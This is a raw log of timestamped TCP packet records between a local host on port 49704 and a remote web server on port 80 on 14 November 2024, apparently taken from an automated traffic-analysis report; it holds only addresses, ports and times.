                                                                                        Nov 14, 2024 08:15:36.133580923 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133584023 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133593082 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133605003 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133630991 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133815050 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133827925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133838892 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133850098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133862019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133871078 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133872032 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133887053 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133898020 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133903980 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133909941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133914948 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133924007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133938074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.133938074 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.133965969 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134097099 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134109020 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134119987 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134130955 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134135008 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134160042 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134212971 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134223938 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134233952 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134246111 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134252071 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134259939 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134279966 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134290934 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134453058 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134464025 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134474993 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134485960 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134490967 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134506941 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134517908 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134529114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134537935 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134541988 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134553909 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134560108 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134567976 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134587049 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134607077 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134685993 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134699106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134711981 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134721994 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134737968 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134752989 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134830952 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134848118 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134862900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134876013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134897947 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134908915 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.134968996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134984970 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.134994984 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135019064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135021925 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135031939 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135044098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135055065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135056019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135082960 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135085106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135099888 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135127068 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135130882 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135143995 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135168076 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135349989 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135365009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135376930 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135390043 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135389090 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135402918 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135412931 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135416985 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135430098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135441065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135443926 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135469913 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135618925 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135633945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135644913 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135658026 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135663033 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.135669947 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135683060 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.135694981 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.253878117 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.253885984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.253889084 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.253901005 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.253911972 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.253935099 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.295283079 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366400003 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366463900 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366511106 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366516113 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366620064 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366633892 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366647959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366663933 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366687059 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366691113 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366703033 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366714954 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366727114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366740942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366746902 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366750002 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366763115 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366775036 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366795063 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366796970 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366806030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366818905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366832972 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366844893 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366846085 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366854906 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366872072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366873026 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366882086 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366897106 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366930962 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366950035 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366966963 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.366966963 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.366977930 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367021084 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367146015 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367157936 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367168903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367192984 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367258072 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367269039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367286921 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367290974 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367296934 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367322922 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367415905 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367451906 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367459059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367471933 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367505074 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367546082 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367554903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367562056 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367578030 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367588997 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367620945 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367641926 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367654085 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367670059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367687941 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367784023 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367795944 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367806911 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367816925 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367820024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367831945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367850065 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367876053 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.367916107 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367927074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367938995 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367949963 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367960930 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.367978096 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368007898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368052006 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368062019 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368072987 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368091106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368098974 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368104935 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368114948 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368141890 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368194103 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368205070 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368216038 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368225098 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368235111 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368238926 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368256092 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368307114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368319035 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368330956 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368354082 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368364096 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368463993 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368475914 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368488073 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368499041 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368511915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368521929 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368530035 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368534088 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368546009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368555069 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368593931 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368685007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368695974 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368706942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368727922 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368863106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368875027 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368887901 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368895054 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368901014 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368911982 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368918896 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368923903 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368936062 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368946075 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368949890 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368958950 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368968964 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368968964 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368980885 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.368990898 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.368994951 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369024038 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369132042 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369143009 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369164944 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369303942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369316101 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369327068 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369338036 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369343996 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369355917 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369366884 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369370937 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369378090 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369388103 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369389057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369400024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369411945 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369415045 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369424105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369443893 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369457006 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369604111 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369613886 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369623899 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369635105 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369645119 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369652033 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369658947 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369668961 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369671106 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369682074 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369695902 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369714975 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369800091 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369811058 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369823933 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369836092 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369841099 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369847059 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369858980 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369879961 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369903088 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.369987965 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.369998932 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.370011091 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.370022058 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488487959 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488500118 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488504887 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488511086 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488523006 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488553047 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488575935 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488605976 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488616943 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488627911 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488640070 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488648891 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488651991 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488663912 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488692999 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488764048 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488775969 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488785982 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488816977 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.488931894 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488945007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488957882 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488967896 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488977909 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.488982916 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489011049 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489113092 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489125013 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489136934 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489142895 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489149094 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489175081 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489284039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489296913 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489306927 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489319086 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489319086 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489331007 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489342928 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489346981 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489352942 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489378929 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489396095 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:36.489438057 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489449978 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489461899 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:36.489473104 CET8049704103.20.102.62192.168.2.5
